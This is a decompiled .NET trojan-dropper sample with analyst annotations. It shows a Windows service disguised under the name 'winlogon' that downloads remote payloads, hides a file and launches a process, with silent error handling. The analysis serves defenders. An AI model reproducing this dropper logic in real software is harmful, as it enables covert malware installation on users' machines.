// Decompiled with JetBrains decompiler
// Type: winlogon.winlogon
// Assembly: winlogon, Version=6.1.7601.17514, Culture=neutral, PublicKeyToken=null
// MVID: AC059A05-C181-4518-A4B8-9A5E8B3420DD
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.famp-6427595611179d5d5dac279b1a45e8419adb3bb7a48e56b0dc2408b6a417bbb5.exe
//
// Analyst notes (added in review; code below is unchanged decompiler output):
// - The sample path above labels this file Trojan-Dropper.Win32.Injector.famp. The type is a
//   Windows service (ServiceBase subclass) that fetches content over HTTP, writes it to disk,
//   sets the Hidden attribute on a file and starts a process.
// - The assembly and type are named "winlogon" and the assembly is not strong-named
//   (PublicKeyToken=null). NOTE(review): the name and version string presumably imitate the
//   Windows component of the same name; a service binary with this name is worth checking
//   for location and signer.
// - Every string is obtained from ipbpJ7ihfEneDowwMq.YHW3lrBiD(int), which is declared in
//   another namespace and is not part of this listing. The URLs, file paths and service name
//   are therefore NOT recoverable from this file; presumably the integer selects an entry in
//   an encoded string table (confirm against the decoder before extracting indicators).
// - Identifiers are obfuscator-generated; the comments below describe each member by what its
//   body does, not by its name.
// - All catch blocks are empty, so failures are silent. Network and file-system telemetry
//   will show this behaviour; application logs will not.
using K6lba8gkqFKwGTxlJE;
using qpa0K4UP35oevQjLvS;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.ServiceProcess;
using System.Timers;

namespace winlogon
{
  /// <summary>
  /// Windows service that, once after a timer fires, downloads files, optionally hides one,
  /// and launches a process. All concrete locations come from the external string decoder.
  /// </summary>
  public class winlogon : ServiceBase
  {
    // Source (download) stream shared by both download routines.
    private Stream tIkqidsdd;
    // Destination (file) stream shared by both download routines.
    private Stream agHpgdkpf;
    // Path of a local file, taken from decoded string 0; its presence and last line drive the
    // branch taken in the timer handler and in Fi3kmxHdd.
    private string TRGxesqWy;
    // Timer armed in OnStart; its Elapsed handler runs the download/launch logic.
    private System.Timers.Timer J4H86ry38;
    // Last non-empty line read from the remote resource in Fi3kmxHdd.
    private string IpbRXnHtq;
    // Last non-empty line read from the local file TRGxesqWy in Fi3kmxHdd.
    private string ojjvCptCp;
    // Component container created in cpsKDrXGe and released in Dispose.
    private IContainer Ymki2qQIc;

    /// <summary>
    /// Initialises the fields, then runs the base constructor and the component setup.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining)]
    public winlogon()
    {
      // Opaque call into the qpa0K4UP35oevQjLvS / K6lba8gkqFKwGTxlJE namespaces; body not shown.
      // NOTE(review): presumably obfuscator runtime initialisation — confirm.
      r6O22AEB3hooSSmKYs.eqJZdUAzZVtL9();
      this.TRGxesqWy = ipbpJ7ihfEneDowwMq.YHW3lrBiD(0);
      this.J4H86ry38 = new System.Timers.Timer();
      this.IpbRXnHtq = string.Empty;
      this.ojjvCptCp = string.Empty;
      // The decompiler emits the field initialisers before the base constructor call, which is
      // the IL order; the explicit call below is not valid C# source as written.
      // ISSUE: explicit constructor call
      base.\u002Ector();
      this.cpsKDrXGe();
    }

    /// <summary>
    /// Downloads the resource at decoded string 42 and writes it to the path in decoded
    /// string 122, overwriting any existing file. Errors are swallowed.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining)]
    private void c1SU2WrXB()
    {
      try
      {
        using (WebClient webClient = new WebClient())
        {
          this.tIkqidsdd = webClient.OpenRead(ipbpJ7ihfEneDowwMq.YHW3lrBiD(42));
          // FileMode.Create truncates an existing file; FileShare.None blocks other openers
          // while the copy runs.
          this.agHpgdkpf = (Stream) new FileStream(ipbpJ7ihfEneDowwMq.YHW3lrBiD(122), FileMode.Create, FileAccess.Write, FileShare.None);
          byte[] buffer = new byte[2048];
          int count;
          // Copy in 2048-byte chunks until the remote stream is exhausted.
          while ((count = this.tIkqidsdd.Read(buffer, 0, buffer.Length)) > 0)
            this.agHpgdkpf.Write(buffer, 0, count);
        }
        // The streams are closed only on the success path; an exception above skips both calls.
        this.tIkqidsdd.Close();
        this.agHpgdkpf.Close();
      }
      catch
      {
      }
    }

    /// <summary>
    /// Requests the resource at decoded string 164 and returns its last non-empty line.
    /// </summary>
    /// <returns>
    /// The last non-empty line of the response, an empty string if there is none, or decoded
    /// string 240 if any exception occurs.
    /// </returns>
    [MethodImpl(MethodImplOptions.NoInlining)]
    private string eqYl4FZqm()
    {
      try
      {
        StreamReader streamReader = new StreamReader(WebRequest.Create(ipbpJ7ihfEneDowwMq.YHW3lrBiD(164)).GetResponse().GetResponseStream());
        string str1 = string.Empty;
        for (string str2 = streamReader.ReadLine(); str2 != null; str2 = streamReader.ReadLine())
        {
          // Each received line is echoed to the console.
          Console.WriteLine(str2);
          if (str2 != null && str2 != string.Empty)
            str1 = str2;
        }
        streamReader.Close();
        return str1;
      }
      catch
      {
        // Fallback value returned on failure; the caller compares against decoded string 264.
        // NOTE(review): whether 240 and 264 decode to the same text cannot be told from here.
        return ipbpJ7ihfEneDowwMq.YHW3lrBiD(240);
      }
    }

    /// <summary>
    /// Obtains a download address from <c>eqYl4FZqm</c>, writes that resource to the path in
    /// decoded string 288, then sets the Hidden attribute on a file. Errors are swallowed.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining)]
    private void egcS2HvT8()
    {
      try
      {
        using (WebClient webClient = new WebClient())
        {
          // The address is supplied by the remote side at run time, so the second-stage
          // location is not fixed in the binary.
          string address = this.eqYl4FZqm();
          // Skip the download when the address equals the value in decoded string 264.
          if (address != ipbpJ7ihfEneDowwMq.YHW3lrBiD(264))
          {
            this.tIkqidsdd = webClient.OpenRead(address);
            this.agHpgdkpf = (Stream) new FileStream(ipbpJ7ihfEneDowwMq.YHW3lrBiD(288), FileMode.Create, FileAccess.Write, FileShare.None);
            byte[] buffer = new byte[2048];
            int count;
            while ((count = this.tIkqidsdd.Read(buffer, 0, buffer.Length)) > 0)
              this.agHpgdkpf.Write(buffer, 0, count);
          }
        }
        // These fields may still hold streams from an earlier call, or be null if no download
        // has run yet; a null here throws into the empty catch and skips the steps below.
        this.tIkqidsdd.Close();
        this.agHpgdkpf.Close();
        if (!System.IO.File.Exists(ipbpJ7ihfEneDowwMq.YHW3lrBiD(332)))
          return;
        // Marks the file hidden. NOTE(review): offsets 288, 332 and 376 are distinct decoder
        // inputs; presumably they decode to the same path — confirm.
        System.IO.File.SetAttributes(ipbpJ7ihfEneDowwMq.YHW3lrBiD(376), FileAttributes.Hidden);
      }
      catch
      {
      }
    }

    /// <summary>
    /// Starts a process from decoded string 464 if the file in decoded string 420 exists.
    /// Errors are swallowed.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining)]
    private void AXlek072B()
    {
      try
      {
        if (!System.IO.File.Exists(ipbpJ7ihfEneDowwMq.YHW3lrBiD(420)))
          return;
        // The child process is created by the service process itself.
        // NOTE(review): 420 and 464 presumably decode to the same path — confirm.
        Process.Start(ipbpJ7ihfEneDowwMq.YHW3lrBiD(464));
      }
      catch
      {
      }
    }

    /// <summary>
    /// Compares the last non-empty line of a remote resource (decoded string 508) with the last
    /// non-empty line of the local file <c>TRGxesqWy</c> and chooses which download and launch
    /// steps to run. NOTE(review): this looks like a version/update check — confirm.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining)]
    private void Fi3kmxHdd()
    {
      try
      {
        StreamReader streamReader1 = new StreamReader(WebRequest.Create(ipbpJ7ihfEneDowwMq.YHW3lrBiD(508)).GetResponse().GetResponseStream());
        // empty1 / empty2 are never read; they are kept as emitted by the decompiler.
        string empty1 = string.Empty;
        for (string str = streamReader1.ReadLine(); str != null; str = streamReader1.ReadLine())
        {
          Console.WriteLine(str);
          if (str != null && str != string.Empty)
            this.IpbRXnHtq = str;
        }
        streamReader1.Close();
        StreamReader streamReader2 = System.IO.File.OpenText(this.TRGxesqWy);
        string empty2 = string.Empty;
        for (string str = streamReader2.ReadLine(); str != null; str = streamReader2.ReadLine())
        {
          Console.WriteLine(str);
          if (str != null && str != string.Empty)
            this.ojjvCptCp = str;
        }
        streamReader2.Close();
        if (this.IpbRXnHtq != this.ojjvCptCp)
        {
          // Remote and local values differ: run both downloads, then launch.
          this.c1SU2WrXB();
          this.egcS2HvT8();
          this.AXlek072B();
        }
        else if (System.IO.File.Exists(ipbpJ7ihfEneDowwMq.YHW3lrBiD(588)))
        {
          // Values match and the file in decoded string 588 exists: launch only.
          this.AXlek072B();
        }
        else
        {
          // Values match but that file is missing: repeat the second download, then launch.
          this.egcS2HvT8();
          this.AXlek072B();
        }
      }
      catch
      {
        // Any failure (no network, unreadable local file) still attempts the launch.
        this.AXlek072B();
      }
    }

    /// <summary>
    /// Service start: arms the timer with a 300000 ms (5 minute) interval and attaches
    /// <c>LPFCHd2BB</c> as the Elapsed handler. No work is done at start itself.
    /// </summary>
    /// <param name="args">Service start arguments; not used.</param>
    [MethodImpl(MethodImplOptions.NoInlining)]
    protected override void OnStart(string[] args)
    {
      this.J4H86ry38.Interval = 300000.0;
      this.J4H86ry38.Elapsed += new ElapsedEventHandler(this.LPFCHd2BB);
      this.J4H86ry38.Start();
    }

    /// <summary>
    /// Timer handler. Stops the timer, then either runs the full download-and-launch sequence
    /// (local file <c>TRGxesqWy</c> absent) or the comparison routine <c>Fi3kmxHdd</c>.
    /// </summary>
    /// <param name="obj0">Event sender; not used.</param>
    /// <param name="obj1">Elapsed event data; not used.</param>
    [MethodImpl(MethodImplOptions.NoInlining)]
    private void LPFCHd2BB([In] object obj0, [In] ElapsedEventArgs obj1)
    {
      // The timer is stopped here and nothing in this class starts it again, so the handler
      // runs once per service start, five minutes after OnStart.
      this.J4H86ry38.Stop();
      if (!System.IO.File.Exists(this.TRGxesqWy))
      {
        this.c1SU2WrXB();
        this.egcS2HvT8();
        this.AXlek072B();
      }
      else
        this.Fi3kmxHdd();
    }

    /// <summary>
    /// Service stop: stops the timer. Processes already started by <c>AXlek072B</c> are not
    /// touched by this method.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining)]
    protected override void OnStop() => this.J4H86ry38.Stop();

    /// <summary>
    /// Disposes the component container when called with <paramref name="disposing"/> true,
    /// then defers to the base implementation.
    /// </summary>
    /// <param name="disposing">True when called from Dispose rather than a finalizer.</param>
    [MethodImpl(MethodImplOptions.NoInlining)]
    protected override void Dispose(bool disposing)
    {
      if (disposing && this.Ymki2qQIc != null)
        this.Ymki2qQIc.Dispose();
      base.Dispose(disposing);
    }

    /// <summary>
    /// Component setup called from the constructor: creates the container and sets the
    /// service name from decoded string 632.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining)]
    private void cpsKDrXGe()
    {
      this.Ymki2qQIc = (IContainer) new Container();
      // The registered service name is only available by decoding string 632.
      this.ServiceName = ipbpJ7ihfEneDowwMq.YHW3lrBiD(632);
    }
  }
}